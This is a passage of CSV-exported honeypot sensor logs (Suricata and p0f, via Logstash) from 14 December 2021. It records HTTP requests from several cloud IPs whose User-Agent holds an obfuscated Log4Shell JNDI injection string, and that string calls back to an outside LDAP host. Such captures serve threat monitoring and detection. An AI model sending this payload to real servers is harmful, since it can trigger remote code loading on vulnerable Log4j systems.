deflate",,,,"172.16.0.42",,GET,8000,,,,,,"${jndi:${lower:l}${lower:d}a${lower:p}://world8000.log4j.bin${upper:a}ryedge.io:80/callback}",0,"HTTP/1.1",200,"/",,,,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",26338618,,"{""timestamp"":""2021-12-14T11:58:03.321625+0000"",""flow_id"":1253204998859741,""in_iface"":""eth0"",""event_type"":""http"",""src_ip"":""138.68.246.18"",""src_port"":57872,""dest_ip"":""172.16.0.42"",""dest_port"":8000,""proto"":""TCP"",""tx_id"":0,""http"":{""hostname"":""172.16.0.42"",""http_port"":8000,""url"":""/"",""http_user_agent"":""${jndi:${lower:l}${lower:d}a${lower:p}://world8000.log4j.bin${upper:a}ryedge.io:80/callback}"",""accept_encoding"":""gzip, deflate"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":0}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"138.68.246.18",57872,,,,,,,,,,,,doubletomato,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied""]",,,,"2021-12-14T11:58:03.321625+0000",,,,,,,,0,Suricata,,,,
"2021-12-14T11:58:03.000Z",1,"JF3OuH0B6VkG8jKzk-in","logstash-p0f-2021.12.14",,"_doc","41f5ce73-e4e6-402f-bd92-414128b3d431",5a16b4616656,"821eb7a4-bb66-44ba-8f2f-a12f3c9bbe10",5a16b4616656,filebeat,"7.11.1",,,,,,,,,,,,,,,"???",,,,,,,"172.16.0.42",8000,,,"1.6.0",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"Digital Ocean, Inc.",14061,"Santa Clara",NA,US,US,"United States",807,"138.68.246.18","37.3417","{""lon"":-121.9753,""lat"":37.3417}","-121.9753",95051,CA,California,"America/Los_Angeles",,,,,,,,,,,,,,,5a16b4616656,,,,,,,,,,,,,,,,,,,,,,,,log,,,,none,,,,"/data/p0f/log/p0f.json",8342273,,"{""timestamp"": ""2021/12/14 11:58:03"", ""mod"": ""http request"", ""client_ip"": ""138.68.246.18"", ""server_ip"": ""172.16.0.42"", ""client_port"": 57894, ""server_port"": 8000, ""subject"": ""cli"", ""app"": ""???"", ""lang"": ""none"", ""params"": ""none"", ""raw_sig"": ""1:Host,User-Agent,Accept-Encoding=[gzip, deflate],Accept=[*/*],Connection=[keep-alive]:Accept-Language,Accept-Charset,Keep-Alive:${jndi:${lower:l}${lower:d}a${lower:p}://world8000.log4j.bin${upper:a}ryedge.io:80/callback}""}",,,,,,,"http request",,,none,,,,,,,,,,,"1:Host,User-Agent,Accept-Encoding=[gzip, deflate],Accept=[*/*],Connection=[keep-alive]:Accept-Language,Accept-Charset,Keep-Alive:${jndi:${lower:l}${lower:d}a${lower:p}://world8000.log4j.bin${upper:a}ryedge.io:80/callback}",,,,,,,,,,,,,,,,,,,,,,,,,"138.68.246.18",57894,,,,,,,,,,,cli,doubletomato,"172.16.0.42","172.16.0.42","[""p0f"",""beats_input_codec_plain_applied""]",,,,,,,,,,,,,P0f,,,,
"2021-12-14T11:58:01.000Z",1,VPvOuH0B5e7x5EYnkw6o,"logstash-p0f-2021.12.14",,"_doc","41f5ce73-e4e6-402f-bd92-414128b3d431",5a16b4616656,"821eb7a4-bb66-44ba-8f2f-a12f3c9bbe10",5a16b4616656,filebeat,"7.11.1",,,,,,,,,,,,,,,"???",,,,,,,"172.16.0.42",8000,,,"1.6.0",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"Digital Ocean, Inc.",14061,"Santa Clara",NA,US,US,"United States",807,"138.68.246.18","37.3417","{""lon"":-121.9753,""lat"":37.3417}","-121.9753",95051,CA,California,"America/Los_Angeles",,,,,,,,,,,,,,,5a16b4616656,,,,,,,,,,,,,,,,,,,,,,,,log,,,,none,,,,"/data/p0f/log/p0f.json",8334264,,"{""timestamp"": ""2021/12/14 11:58:01"", ""mod"": ""http request"", ""client_ip"": ""138.68.246.18"", ""server_ip"": ""172.16.0.42"", ""client_port"": 57872, ""server_port"": 8000, ""subject"": ""cli"", ""app"": ""???"", ""lang"": ""none"", ""params"": ""none"", ""raw_sig"": ""1:Host,User-Agent,Accept-Encoding=[gzip, deflate],Accept=[*/*],Connection=[keep-alive]:Accept-Language,Accept-Charset,Keep-Alive:${jndi:${lower:l}${lower:d}a${lower:p}://world8000.log4j.bin${upper:a}ryedge.io:80/callback}""}",,,,,,,"http request",,,none,,,,,,,,,,,"1:Host,User-Agent,Accept-Encoding=[gzip, deflate],Accept=[*/*],Connection=[keep-alive]:Accept-Language,Accept-Charset,Keep-Alive:${jndi:${lower:l}${lower:d}a${lower:p}://world8000.log4j.bin${upper:a}ryedge.io:80/callback}",,,,,,,,,,,,,,,,,,,,,,,,,"138.68.246.18",57872,,,,,,,,,,,cli,doubletomato,"172.16.0.42","172.16.0.42","[""p0f"",""beats_input_codec_plain_applied""]",,,,,,,,,,,,,P0f,,,,
"2021-12-14T11:35:46.989Z",1,Jvq6uH0B5e7x5EYnM5Ch,"logstash-suricata-2021.12.14",,"_doc","445b199a-9932-481e-bb91-55eeb7bcdd09",0ec2be0d4512,"a397defb-6fa3-487d-9801-6db484692ca1",0ec2be0d4512,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",8000,,,"1.6.0",,http,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,1802325070114884,"Digital Ocean, Inc.",14061,"Santa Clara",NA,US,US,"United States",807,"138.68.4.129","37.3417","{""lon"":-121.9753,""lat"":37.3417}","-121.9753",95051,CA,California,"America/Los_Angeles",,,,,,,,,,,,,,,0ec2be0d4512,"gzip, deflate",,,,"172.16.0.42",,GET,8000,,,,,,"${jndi:${lower:l}${lower:d}a${lower:p}://world8000.log4j.bin${upper:a}ryedge.io:80/callback}",0,"HTTP/1.1",200,"/favicon.ico",,,,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",13422892,,"{""timestamp"":""2021-12-14T11:35:46.989671+0000"",""flow_id"":1802325070114884,""in_iface"":""eth0"",""event_type"":""http"",""src_ip"":""138.68.4.129"",""src_port"":54220,""dest_ip"":""172.16.0.42"",""dest_port"":8000,""proto"":""TCP"",""tx_id"":0,""http"":{""hostname"":""172.16.0.42"",""http_port"":8000,""url"":""/favicon.ico"",""http_user_agent"":""${jndi:${lower:l}${lower:d}a${lower:p}://world8000.log4j.bin${upper:a}ryedge.io:80/callback}"",""accept_encoding"":""gzip, deflate"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":0}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"138.68.4.129",54220,,,,,,,,,,,,inherentfocus,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied""]",,,,"2021-12-14T11:35:46.989671+0000",,,,,,,,0,Suricata,,,,
"2021-12-14T11:35:46.845Z",1,Jfq6uH0B5e7x5EYnM5Ch,"logstash-suricata-2021.12.14",,"_doc","445b199a-9932-481e-bb91-55eeb7bcdd09",0ec2be0d4512,"a397defb-6fa3-487d-9801-6db484692ca1",0ec2be0d4512,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",8000,,,"1.6.0",,http,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,384925732884441,"Digital Ocean, Inc.",14061,"Santa Clara",NA,US,US,"United States",807,"138.68.4.129","37.3417","{""lon"":-121.9753,""lat"":37.3417}","-121.9753",95051,CA,California,"America/Los_Angeles",,,,,,,,,,,,,,,0ec2be0d4512,"gzip, deflate",,,,"172.16.0.42",,GET,8000,,,,,,"${jndi:${lower:l}${lower:d}a${lower:p}://world8000.log4j.bin${upper:a}ryedge.io:80/callback}",0,"HTTP/1.1",200,"/",,,,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",13422396,,"{""timestamp"":""2021-12-14T11:35:46.845249+0000"",""flow_id"":384925732884441,""in_iface"":""eth0"",""event_type"":""http"",""src_ip"":""138.68.4.129"",""src_port"":54134,""dest_ip"":""172.16.0.42"",""dest_port"":8000,""proto"":""TCP"",""tx_id"":0,""http"":{""hostname"":""172.16.0.42"",""http_port"":8000,""url"":""/"",""http_user_agent"":""${jndi:${lower:l}${lower:d}a${lower:p}://world8000.log4j.bin${upper:a}ryedge.io:80/callback}"",""accept_encoding"":""gzip, deflate"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":0}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"138.68.4.129",54134,,,,,,,,,,,,inherentfocus,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied""]",,,,"2021-12-14T11:35:46.845249+0000",,,,,,,,0,Suricata,,,,
"2021-12-14T11:35:46.000Z",1,5vq6uH0B5e7x5EYnLY93,"logstash-p0f-2021.12.14",,"_doc","445b199a-9932-481e-bb91-55eeb7bcdd09",0ec2be0d4512,"a397defb-6fa3-487d-9801-6db484692ca1",0ec2be0d4512,filebeat,"7.11.1",,,,,,,,,,,,,,,"???",,,,,,,"172.16.0.42",8000,,,"1.6.0",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"Digital Ocean, Inc.",14061,"Santa Clara",NA,US,US,"United States",807,"138.68.4.129","37.3417","{""lon"":-121.9753,""lat"":37.3417}","-121.9753",95051,CA,California,"America/Los_Angeles",,,,,,,,,,,,,,,0ec2be0d4512,,,,,,,,,,,,,,,,,,,,,,,,log,,,,none,,,,"/data/p0f/log/p0f.json",8876476,,"{""timestamp"": ""2021/12/14 11:35:46"", ""mod"": ""http request"", ""client_ip"": ""138.68.4.129"", ""server_ip"": ""172.16.0.42"", ""client_port"": 54220, ""server_port"": 8000, ""subject"": ""cli"", ""app"": ""???"", ""lang"": ""none"", ""params"": ""none"", ""raw_sig"": ""1:Host,User-Agent,Accept-Encoding=[gzip, deflate],Accept=[*/*],Connection=[keep-alive]:Accept-Language,Accept-Charset,Keep-Alive:${jndi:${lower:l}${lower:d}a${lower:p}://world8000.log4j.bin${upper:a}ryedge.io:80/callback}""}",,,,,,,"http request",,,none,,,,,,,,,,,"1:Host,User-Agent,Accept-Encoding=[gzip, deflate],Accept=[*/*],Connection=[keep-alive]:Accept-Language,Accept-Charset,Keep-Alive:${jndi:${lower:l}${lower:d}a${lower:p}://world8000.log4j.bin${upper:a}ryedge.io:80/callback}",,,,,,,,,,,,,,,,,,,,,,,,,"138.68.4.129",54220,,,,,,,,,,,cli,inherentfocus,"172.16.0.42","172.16.0.42","[""p0f"",""beats_input_codec_plain_applied""]",,,,,,,,,,,,,P0f,,,,
"2021-12-14T11:35:46.000Z",1,3vq6uH0B5e7x5EYnLY93,"logstash-p0f-2021.12.14",,"_doc","445b199a-9932-481e-bb91-55eeb7bcdd09",0ec2be0d4512,"a397defb-6fa3-487d-9801-6db484692ca1",0ec2be0d4512,filebeat,"7.11.1",,,,,,,,,,,,,,,"???",,,,,,,"172.16.0.42",8000,,,"1.6.0",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"Digital Ocean, Inc.",14061,"Santa Clara",NA,US,US,"United States",807,"138.68.4.129","37.3417","{""lon"":-121.9753,""lat"":37.3417}","-121.9753",95051,CA,California,"America/Los_Angeles",,,,,,,,,,,,,,,0ec2be0d4512,,,,,,,,,,,,,,,,,,,,,,,,log,,,,none,,,,"/data/p0f/log/p0f.json",8874194,,"{""timestamp"": ""2021/12/14 11:35:46"", ""mod"": ""http request"", ""client_ip"": ""138.68.4.129"", ""server_ip"": ""172.16.0.42"", ""client_port"": 54134, ""server_port"": 8000, ""subject"": ""cli"", ""app"": ""???"", ""lang"": ""none"", ""params"": ""none"", ""raw_sig"": ""1:Host,User-Agent,Accept-Encoding=[gzip, deflate],Accept=[*/*],Connection=[keep-alive]:Accept-Language,Accept-Charset,Keep-Alive:${jndi:${lower:l}${lower:d}a${lower:p}://world8000.log4j.bin${upper:a}ryedge.io:80/callback}""}",,,,,,,"http request",,,none,,,,,,,,,,,"1:Host,User-Agent,Accept-Encoding=[gzip, deflate],Accept=[*/*],Connection=[keep-alive]:Accept-Language,Accept-Charset,Keep-Alive:${jndi:${lower:l}${lower:d}a${lower:p}://world8000.log4j.bin${upper:a}ryedge.io:80/callback}",,,,,,,,,,,,,,,,,,,,,,,,,"138.68.4.129",54134,,,,,,,,,,,cli,inherentfocus,"172.16.0.42","172.16.0.42","[""p0f"",""beats_input_codec_plain_applied""]",,,,,,,,,,,,,P0f,,,,
"2021-12-14T09:57:29.317Z",1,j1pguH0B6VkG8jKzNsYk,"logstash-suricata-2021.12.14",,"_doc","be4f014d-3826-40b1-8d6f-62f56ed1024b",2c4f3c6153a8,"2fc0c8f9-449c-4f91-96aa-c28f4acb3f85",2c4f3c6153a8,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",8000,,,"1.6.0",,http,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,145227516572743,,,"Santa Clara",NA,US,US,"United States",807,"159.65.110.157","37.3417","{""lon"":-121.9753,""lat"":37.3417}","-121.9753",95051,CA,California,"America/Los_Angeles",,,,,,,,,,,,,,,2c4f3c6153a8,"gzip, deflate",,,,"172.16.0.42",,GET,8000,,,,,,"${jndi:${lower:l}${lower:d}a${lower:p}://world8000.log4j.bin${upper:a}ryedge.io:80/callback}",0,"HTTP/1.1",200,"/favicon.ico",,,,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",16605314,,"{""timestamp"":""2021-12-14T09:57:29.317930+0000"",""flow_id"":145227516572743,""in_iface"":""eth0"",""event_type"":""http"",""src_ip"":""159.65.110.157"",""src_port"":44460,""dest_ip"":""172.16.0.42"",""dest_port"":8000,""proto"":""TCP"",""tx_id"":0,""http"":{""hostname"":""172.16.0.42"",""http_port"":8000,""url"":""/favicon.ico"",""http_user_agent"":""${jndi:${lower:l}${lower:d}a${lower:p}://world8000.log4j.bin${upper:a}ryedge.io:80/callback}"",""accept_encoding"":""gzip, deflate"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":0}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"159.65.110.157",44460,,,,,,,,,,,,disturbedyoung,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied"",""_geoip_lookup_failure""]",,,,"2021-12-14T09:57:29.317930+0000",,,,,,,,0,Suricata,,,,
"2021-12-14T09:57:29.023Z",1,jlpguH0B6VkG8jKzNsYk,"logstash-suricata-2021.12.14",,"_doc","be4f014d-3826-40b1-8d6f-62f56ed1024b",2c4f3c6153a8,"2fc0c8f9-449c-4f91-96aa-c28f4acb3f85",2c4f3c6153a8,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",8000,,,"1.6.0",,http,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,2101868587673063,,,"Santa Clara",NA,US,US,"United States",807,"159.65.110.157","37.3417","{""lon"":-121.9753,""lat"":37.3417}","-121.9753",95051,CA,California,"America/Los_Angeles",,,,,,,,,,,,,,,2c4f3c6153a8,"gzip, deflate",,,,"172.16.0.42",,GET,8000,,,,,,"${jndi:${lower:l}${lower:d}a${lower:p}://world8000.log4j.bin${upper:a}ryedge.io:80/callback}",0,"HTTP/1.1",200,"/",,,,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",16604815,,"{""timestamp"":""2021-12-14T09:57:29.023765+0000"",""flow_id"":2101868587673063,""in_iface"":""eth0"",""event_type"":""http"",""src_ip"":""159.65.110.157"",""src_port"":44452,""dest_ip"":""172.16.0.42"",""dest_port"":8000,""proto"":""TCP"",""tx_id"":0,""http"":{""hostname"":""172.16.0.42"",""http_port"":8000,""url"":""/"",""http_user_agent"":""${jndi:${lower:l}${lower:d}a${lower:p}://world8000.log4j.bin${upper:a}ryedge.io:80/callback}"",""accept_encoding"":""gzip, deflate"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":0}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"159.65.110.157",44452,,,,,,,,,,,,disturbedyoung,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied"",""_geoip_lookup_failure""]",,,,"2021-12-14T09:57:29.023765+0000",,,,,,,,0,Suricata,,,,
"2021-12-14T09:57:29.000Z",1,y4xguH0BCXMCNTQLLmNi,"logstash-p0f-2021.12.14",,"_doc","be4f014d-3826-40b1-8d6f-62f56ed1024b",2c4f3c6153a8,"2fc0c8f9-449c-4f91-96aa-c28f4acb3f85",2c4f3c6153a8,filebeat,"7.11.1",,,,,,,,,,,,,,,"???",,,,,,,"172.16.0.42",8000,,,"1.6.0",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"Santa Clara",NA,US,US,"United States",807,"159.65.110.157","37.3417","{""lon"":-121.9753,""lat"":37.3417}","-121.9753",95051,CA,California,"America/Los_Angeles",,,,,,,,,,,,,,,2c4f3c6153a8,,,,,,,,,,,,,,,,,,,,,,,,log,,,,none,,,,"/data/p0f/log/p0f.json",15000559,,"{""timestamp"": ""2021/12/14 09:57:29"", ""mod"": ""http request"", ""client_ip"": ""159.65.110.157"", ""server_ip"": ""172.16.0.42"", ""client_port"": 44460, ""server_port"": 8000, ""subject"": ""cli"", ""app"": ""???"", ""lang"": ""none"", ""params"": ""none"", ""raw_sig"": ""1:Host,User-Agent,Accept-Encoding=[gzip, deflate],Accept=[*/*],Connection=[keep-alive]:Accept-Language,Accept-Charset,Keep-Alive:${jndi:${lower:l}${lower:d}a${lower:p}://world8000.log4j.bin${upper:a}ryedge.io:80/callback}""}",,,,,,,"http request",,,none,,,,,,,,,,,"1:Host,User-Agent,Accept-Encoding=[gzip, deflate],Accept=[*/*],Connection=[keep-alive]:Accept-Language,Accept-Charset,Keep-Alive:${jndi:${lower:l}${lower:d}a${lower:p}://world8000.log4j.bin${upper:a}ryedge.io:80/callback}",,,,,,,,,,,,,,,,,,,,,,,,,"159.65.110.157",44460,,,,,,,,,,,cli,disturbedyoung,"172.16.0.42","172.16.0.42","[""p0f"",""beats_input_codec_plain_applied"",""_geoip_lookup_failure""]",,,,,,,,,,,,,P0f,,,,
"2021-12-14T09:57:28.000Z",1,v4xguH0BCXMCNTQLLmNi,"logstash-p0f-2021.12.14",,"_doc","be4f014d-3826-40b1-8d6f-62f56ed1024b",2c4f3c6153a8,"2fc0c8f9-449c-4f91-96aa-c28f4acb3f85",2c4f3c6153a8,filebeat,"7.11.1",,,,,,,,,,,,,,,"???",,,,,,,"172.16.0.42",8000,,,"1.6.0",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"Santa Clara",NA,US,US,"United States",807,"159.65.110.157","37.3417","{""lon"":-121.9753,""lat"":37.3417}","-121.9753",95051,CA,California,"America/Los_Angeles",,,,,,,,,,,,,,,2c4f3c6153a8,,,,,,,,,,,,,,,,,,,,,,,,log,,,,none,,,,"/data/p0f/log/p0f.json",14997245,,"{""timestamp"": ""2021/12/14 09:57:28"", ""mod"": ""http request"", ""client_ip"": ""159.65.110.157"", ""server_ip"": ""172.16.0.42"", ""client_port"": 44452, ""server_port"": 8000, ""subject"": ""cli"", ""app"": ""???"", ""lang"": ""none"", ""params"": ""none"", ""raw_sig"": ""1:Host,User-Agent,Accept-Encoding=[gzip, deflate],Accept=[*/*],Connection=[keep-alive]:Accept-Language,Accept-Charset,Keep-Alive:${jndi:${lower:l}${lower:d}a${lower:p}://world8000.log4j.bin${upper:a}ryedge.io:80/callback}""}",,,,,,,"http request",,,none,,,,,,,,,,,"1:Host,User-Agent,Accept-Encoding=[gzip, deflate],Accept=[*/*],Connection=[keep-alive]:Accept-Language,Accept-Charset,Keep-Alive:${jndi:${lower:l}${lower:d}a${lower:p}://world8000.log4j.bin${upper:a}ryedge.io:80/callback}",,,,,,,,,,,,,,,,,,,,,,,,,"159.65.110.157",44452,,,,,,,,,,,cli,disturbedyoung,"172.16.0.42","172.16.0.42","[""p0f"",""beats_input_codec_plain_applied"",""_geoip_lookup_failure""]",,,,,,,,,,,,,P0f,,,,
"2021-12-14T09:45:51.953Z",1,2fdVuH0B5e7x5EYniJly,"logstash-suricata-2021.12.14",,"_doc","b349ec7c-568b-4b15-8032-8cb715450d31",416d6adb7714,"18d8ffa9-baf7-4cdc-ba61-9eeefde07664",416d6adb7714,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",8000,,,"1.6.0",,http,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,292147564607071,"Digital Ocean, Inc.",14061,"Santa Clara",NA,US,US,"United States",807,"138.197.197.108","37.3417","{""lon"":-121.9753,""lat"":37.3417}","-121.9753",95051,CA,California,"America/Los_Angeles",,,,,,,,,,,,,,,416d6adb7714,"gzip, deflate",,,,"172.16.0.42",,GET,8000,,,,,,"${jndi:${lower:l}${lower:d}a${lower:p}://world8000.log4j.bin${upper:a}ryedge.io:80/callback}",0,"HTTP/1.1",200,"/favicon.ico",,,,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",9760521,,"{""timestamp"":""2021-12-14T09:45:51.953866+0000"",""flow_id"":292147564607071,""in_iface"":""eth0"",""event_type"":""http"",""src_ip"":""138.197.197.108"",""src_port"":51610,""dest_ip"":""172.16.0.42"",""dest_port"":8000,""proto"":""TCP"",""tx_id"":0,""http"":{""hostname"":""172.16.0.42"",""http_port"":8000,""url"":""/favicon.ico"",""http_user_agent"":""${jndi:${lower:l}${lower:d}a${lower:p}://world8000.log4j.bin${upper:a}ryedge.io:80/callback}"",""accept_encoding"":""gzip, deflate"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":0}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"138.197.197.108",51610,,,,,,,,,,,,healthycongresswoman,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied""]",,,,"2021-12-14T09:45:51.953866+0000",,,,,,,,0,Suricata,,,,
"2021-12-14T09:45:51.814Z",1,2PdVuH0B5e7x5EYniJly,"logstash-suricata-2021.12.14",,"_doc","b349ec7c-568b-4b15-8032-8cb715450d31",416d6adb7714,"18d8ffa9-baf7-4cdc-ba61-9eeefde07664",416d6adb7714,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",8000,,,"1.6.0",,http,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,1747580984709091,"Digital Ocean, Inc.",14061,"Santa Clara",NA,US,US,"United States",807,"138.197.197.108","37.3417","{""lon"":-121.9753,""lat"":37.3417}","-121.9753",95051,CA,California,"America/Los_Angeles",,,,,,,,,,,,,,,416d6adb7714,"gzip, deflate",,,,"172.16.0.42",,GET,8000,,,,,,"${jndi:${lower:l}${lower:d}a${lower:p}://world8000.log4j.bin${upper:a}ryedge.io:80/callback}",0,"HTTP/1.1",200,"/",,,,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",9760017,,"{""timestamp"":""2021-12-14T09:45:51.814929+0000"",""flow_id"":1747580984709091,""in_iface"":""eth0"",""event_type"":""http"",""src_ip"":""138.197.197.108"",""src_port"":51594,""dest_ip"":""172.16.0.42"",""dest_port"":8000,""proto"":""TCP"",""tx_id"":0,""http"":{""hostname"":""172.16.0.42"",""http_port"":8000,""url"":""/"",""http_user_agent"":""${jndi:${lower:l}${lower:d}a${lower:p}://world8000.log4j.bin${upper:a}ryedge.io:80/callback}"",""accept_encoding"":""gzip, deflate"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":0}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"138.197.197.108",51594,,,,,,,,,,,,healthycongresswoman,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied""]",,,,"2021-12-14T09:45:51.814929+0000",,,,,,,,0,Suricata,,,,
"2021-12-14T09:45:51.000Z",1,34xVuH0BCXMCNTQLiA16,"logstash-p0f-2021.12.14",,"_doc","b349ec7c-568b-4b15-8032-8cb715450d31",416d6adb7714,"18d8ffa9-baf7-4cdc-ba61-9eeefde07664",416d6adb7714,filebeat,"7.11.1",,,,,,,,,,,,,,,"???",,,,,,,"172.16.0.42",8000,,,"1.6.0",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"Digital Ocean, Inc.",14061,"Santa Clara",NA,US,US,"United States",807,"138.197.197.108","37.3417","{""lon"":-121.9753,""lat"":37.3417}","-121.9753",95051,CA,California,"America/Los_Angeles",,,,,,,,,,,,,,,416d6adb7714,,,,,,,,,,,,,,,,,,,,,,,,log,,,,none,,,,"/data/p0f/log/p0f.json",11824239,,"{""timestamp"": ""2021/12/14 09:45:51"", ""mod"": ""http request"", ""client_ip"": ""138.197.197.108"", ""server_ip"": ""172.16.0.42"", ""client_port"": 51594, ""server_port"": 8000, ""subject"": ""cli"", ""app"": ""???"", ""lang"": ""none"", ""params"": ""none"", ""raw_sig"": ""1:Host,User-Agent,Accept-Encoding=[gzip, deflate],Accept=[*/*],Connection=[keep-alive]:Accept-Language,Accept-Charset,Keep-Alive:${jndi:${lower:l}${lower:d}a${lower:p}://world8000.log4j.bin${upper:a}ryedge.io:80/callback}""}",,,,,,,"http request",,,none,,,,,,,,,,,"1:Host,User-Agent,Accept-Encoding=[gzip, deflate],Accept=[*/*],Connection=[keep-alive]:Accept-Language,Accept-Charset,Keep-Alive:${jndi:${lower:l}${lower:d}a${lower:p}://world8000.log4j.bin${upper:a}ryedge.io:80/callback}",,,,,,,,,,,,,,,,,,,,,,,,,"138.197.197.108",51594,,,,,,,,,,,cli,healthycongresswoman,"172.16.0.42","172.16.0.42","[""p0f"",""beats_input_codec_plain_applied""]",,,,,,,,,,,,,P0f,,,,
"2021-12-14T09:45:51.000Z",1,"5_dVuH0B5e7x5EYnjJlI","logstash-p0f-2021.12.14",,"_doc","b349ec7c-568b-4b15-8032-8cb715450d31",416d6adb7714,"18d8ffa9-baf7-4cdc-ba61-9eeefde07664",416d6adb7714,filebeat,"7.11.1",,,,,,,,,,,,,,,"???",,,,,,,"172.16.0.42",8000,,,"1.6.0",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"Digital Ocean, Inc.",14061,"Santa Clara",NA,US,US,"United States",807,"138.197.197.108","37.3417","{""lon"":-121.9753,""lat"":37.3417}","-121.9753",95051,CA,California,"America/Los_Angeles",,,,,,,,,,,,,,,416d6adb7714,,,,,,,,,,,,,,,,,,,,,,,,log,,,,none,,,,"/data/p0f/log/p0f.json",11826816,,"{""timestamp"": ""2021/12/14 09:45:51"", ""mod"": ""http request"", ""client_ip"": ""138.197.197.108"", ""server_ip"": ""172.16.0.42"", ""client_port"": 51610, ""server_port"": 8000, ""subject"": ""cli"", ""app"": ""???"", ""lang"": ""none"", ""params"": ""none"", ""raw_sig"": ""1:Host,User-Agent,Accept-Encoding=[gzip, deflate],Accept=[*/*],Connection=[keep-alive]:Accept-Language,Accept-Charset,Keep-Alive:${jndi:${lower:l}${lower:d}a${lower:p}://world8000.log4j.bin${upper:a}ryedge.io:80/callback}""}",,,,,,,"http request",,,none,,,,,,,,,,,"1:Host,User-Agent,Accept-Encoding=[gzip, deflate],Accept=[*/*],Connection=[keep-alive]:Accept-Language,Accept-Charset,Keep-Alive:${jndi:${lower:l}${lower:d}a${lower:p}://world8000.log4j.bin${upper:a}ryedge.io:80/callback}",,,,,,,,,,,,,,,,,,,,,,,,,"138.197.197.108",51610,,,,,,,,,,,cli,healthycongresswoman,"172.16.0.42","172.16.0.42","[""p0f"",""beats_input_codec_plain_applied""]",,,,,,,,,,,,,P0f,,,,